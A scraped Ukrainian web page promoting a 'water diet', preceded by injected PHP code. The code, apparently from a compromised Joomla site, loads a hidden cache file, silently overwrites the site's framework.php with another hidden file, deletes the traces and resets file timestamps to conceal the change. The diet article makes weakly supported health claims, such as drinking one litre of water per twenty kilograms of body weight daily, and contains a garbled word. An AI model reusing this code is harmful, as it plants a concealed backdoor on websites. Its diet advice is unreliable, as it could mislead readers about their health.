$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Водна дієта: їж досхочу, пий більше! | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Водна дієта: їж досхочу, пий більше!

Вода, вода, вода...

Ми думаємо: щоб схуднути, потрібно обов'язково відмовлятися від мучного та солодкого. Насправді позбутися від зайвих кілограмів можна і без заборони на ласощі. Головне, збільшити споживання питної води - і тоді зайві кілограми тобі не загрожують!

Водна дієта стала відома зовсім недавно, але вже завоювала масу шанувальників. Вона була розроблена американськими дієтологами, які прийшли до висновку, що зайва вага найчастіше з'являється з-за нестачі в організмі води. Від цього виникають часті головні болі, підвищена стомлюваність, втомF і регулярні скачки артеріального тиску. Нестача води в організмі негативно позначається і на нашому зовнішньому вигляді: шкіра стає сухою і тьмяною.

Ця дієта в США сьогодні вважається однією з найбільш затребуваних. Адже при виконанні всіх необхідних правил вона ефективно допомагає не тільки скинути зайві кілограми, але й оздоровити весь організм в цілому. У першу чергу благотворний вплив водної дієти справляє на роботу кишечника. Крім того, завдяки їй покращується колір обличчя, а шкіра стає ніжною, пружною і бархатистою.

Водна дієта - системна, вона розрахована на цілий курс. Після двох тижнів потрібно неодмінно зробити перерву як мінімум на три тижні. Зловживати водної дієтою не варто, оскільки наслідки можуть бути незворотними.

Щоб забезпечити нормальну роботу організму, в день необхідно випивати від півтора до двох літрів води. Ті ж, хто бажає схуднути, повинні випивати більше. Необхідна кількість води, яку необхідно вживати при дієті щоденно, розрахувати досить просто. Треба розділити свою вагу на двадцять. Наприклад, якщо ти важиш 60 кілограмів, то щодня тобі потрібно випивати три літри води.

До речі, під час водної дієти необхідно пити саме воду. Дозволяється вживати кип'ячену, фільтровану або ж негазовану мінеральну.

Для більшого ефекту пити воду потрібно якомога частіше і невеликими порціями. Випивати відразу денну норму в жодному разі не можна, так як вода здатна сильно розтягувати шлунок. У результаті після завершення курсу ти почнеш відчувати постійне відчуття голоду, з потрійною силою накидатися на їжу і швидко повернешся до звичної ваги.

Але при дотриманні дієти не можна забувати, що при щоденному вживанні трьох літрів води з організму вимиваються необхідні речовини: калій, натрій, кальцій. Крім того, при водні дієті частково порушуються мікрофлора кишечника і процеси засвоєння поживних речовин. Тому намагайся в цей період приймати вітамінно-мінеральні комплекси. Вони допоможуть підтримати організм.

Зразок: день водної дієти

Кожній людині вагою 60 кілограмів згідно водної дієті потрібно вживати не менше трьох літрів води щодня. Її потрібно приймати приблизно за півгодини перед основними прийомами їжі.

Перед сніданком - 200 міллілітрів води
Перед обідом - 400 мілілітрів води
Перед полуднем - 400 мілілітрів води
Перед вечерею - 0,5 літра
Перед сном - 0,5 літра

Примітка: решту один літр води, необхідний для схуднення, необхідно випивати між прийомами їжі протягом дня.

Чай, кава, соки, супи та інші напої до дієти ніякого відношення не мають, тому їх в якості вживаної рідини враховувати не потрібно

 
Ефективні дієти Водна дієта: їж досхочу, пий більше!